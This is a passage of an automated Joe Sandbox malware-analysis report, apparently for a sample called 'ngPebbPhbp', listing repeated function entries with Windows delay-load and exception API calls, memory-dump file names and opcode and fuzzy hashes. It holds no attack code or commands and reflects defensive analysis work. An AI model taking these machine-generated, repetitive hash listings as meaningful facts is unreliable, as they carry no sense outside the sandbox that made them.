                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8b0decb524b6946dcf0d4362ea0ebf516620fb845b99f861f4c7e22a5128808e
                                                • Instruction ID: 43cce25f5f850a4bc775827120bdda3f6fd0015337010c23210026f96d354adb
                                                • Opcode Fuzzy Hash: 8b0decb524b6946dcf0d4362ea0ebf516620fb845b99f861f4c7e22a5128808e
                                                • Instruction Fuzzy Hash: 73B012863DD4226C3108A1187F06E3701CCD0C1B1133042EAF40CC2841EF800C4E1031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b71725c00e0c3847da6784bfece19e9440027c53d5fe1919927fe8c96ad0a624
                                                • Instruction ID: dd394bcd5205433658c78d940a0776f5c7e9db5353417675a4e764c347bbe254
                                                • Opcode Fuzzy Hash: b71725c00e0c3847da6784bfece19e9440027c53d5fe1919927fe8c96ad0a624
                                                • Instruction Fuzzy Hash: 4DB012863DD4217C3148A1087F06D3701CCC0C2B1133082DAF80CC3441EF800C4D1031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: fa33e4c0647e8226ea944fb189f87429cf397fff37e836c217f78aa5117e1dd7
                                                • Instruction ID: ec5bd2f112fb9634eae6b35942a3931dd3c752eac4bb24450349f468cd3099cd
                                                • Opcode Fuzzy Hash: fa33e4c0647e8226ea944fb189f87429cf397fff37e836c217f78aa5117e1dd7
                                                • Instruction Fuzzy Hash: F1B012863DD5216C3248A1087F06E3701CCC0C1B1133043EAF40CC2441EF810C8E1031
                                                APIs
                                                • SetCurrentDirectoryW.KERNELBASE(?), ref: 00B12233
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 5b0f99e36a9eb35b39e4053cb788242b9a16fd63a60ee96619d2d9144d73e19d
                                                • Instruction ID: 70a7af29963de80a94abddafe932c9a9cb46faa8c5ae1b9b39574a4952a7d6d1
                                                • Opcode Fuzzy Hash: 5b0f99e36a9eb35b39e4053cb788242b9a16fd63a60ee96619d2d9144d73e19d
                                                • Instruction Fuzzy Hash: F3C04C70201300DF8704CFA4DA8CA0E77EABF567057518468F440CB020C734DD60DB65
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0b8bfc6ced397f27217d49f97ca67c53a8fef05f004b2bdac43b2e2fcc3e29f3
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: 0b8bfc6ced397f27217d49f97ca67c53a8fef05f004b2bdac43b2e2fcc3e29f3
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 961b5e33fa1293a393329510a2458ccef81c96bfb24ee9fd6c86c8ec9084178b
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: 961b5e33fa1293a393329510a2458ccef81c96bfb24ee9fd6c86c8ec9084178b
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e77115a07be1b230e2e8ee2200cac2d2772a5a3c5efeb8bbfd5c73c6da1fef21
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: e77115a07be1b230e2e8ee2200cac2d2772a5a3c5efeb8bbfd5c73c6da1fef21
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 2aab2a5394fac8aad57c09320cc35a5a82af98cf4a9c59ba4c78066e62a899aa
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: 2aab2a5394fac8aad57c09320cc35a5a82af98cf4a9c59ba4c78066e62a899aa
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 36a7b93b986e72fcdb95939ab92bbba206f91f34588706e58512b53eed62a76a
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: 36a7b93b986e72fcdb95939ab92bbba206f91f34588706e58512b53eed62a76a
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0c1ea4ce943ba2e2f89fd7ce2515790a2ed55109eeb2e8c6c5748da27341a048
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: 0c1ea4ce943ba2e2f89fd7ce2515790a2ed55109eeb2e8c6c5748da27341a048
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0a26188f819b36092106891c3f878ba0b22ec209456aa551c8cb7a74ff10d8c7
                                                • Instruction ID: 3882a1ac807825e2e0080d9f3e0eaea84bcf95cdbecfeabec28086afa3a9519a
                                                • Opcode Fuzzy Hash: 0a26188f819b36092106891c3f878ba0b22ec209456aa551c8cb7a74ff10d8c7
                                                • Instruction Fuzzy Hash: 1CA0029559D1217C310451517E46C37019DC4C6B517314A99F40DD58516A8159855431
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 613fbfb07e5091a673c20f8fd2272d38f5d535f2535e185ea58717193d5f8168
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: 613fbfb07e5091a673c20f8fd2272d38f5d535f2535e185ea58717193d5f8168
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c4609f3c23b66181d328d9821cada5a87cf998d306d642f5614dff28d2ee4bdf
                                                • Instruction ID: 75d5143cb32a96e54f3e232a2f8d6acb8dda3cd34bd5f0152ae84c8b18088329
                                                • Opcode Fuzzy Hash: c4609f3c23b66181d328d9821cada5a87cf998d306d642f5614dff28d2ee4bdf
                                                • Instruction Fuzzy Hash: 10A001962AD1317C3108A256BE4BD3B269DC8D2B21731A79AF409D5896AAD05A896032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ecfb3dad201b2fee29569f7b7aa3b0e07b7b2ba33ae8026ae9dbc78305420642
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: ecfb3dad201b2fee29569f7b7aa3b0e07b7b2ba33ae8026ae9dbc78305420642
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 54835d13ad05f7c981d9d830c35dfa9d016524d8c698c5dfc5116d988df84d10
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: 54835d13ad05f7c981d9d830c35dfa9d016524d8c698c5dfc5116d988df84d10
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f88e4f78664b6325b72ab4705c7cd172a62988822fdbd6a7d99f2fe18496be97
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: f88e4f78664b6325b72ab4705c7cd172a62988822fdbd6a7d99f2fe18496be97
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 319ec59ad1ffa824b830a25b8cd59a5358e88c7acd3e75ab2e45d977ff223255
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: 319ec59ad1ffa824b830a25b8cd59a5358e88c7acd3e75ab2e45d977ff223255
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
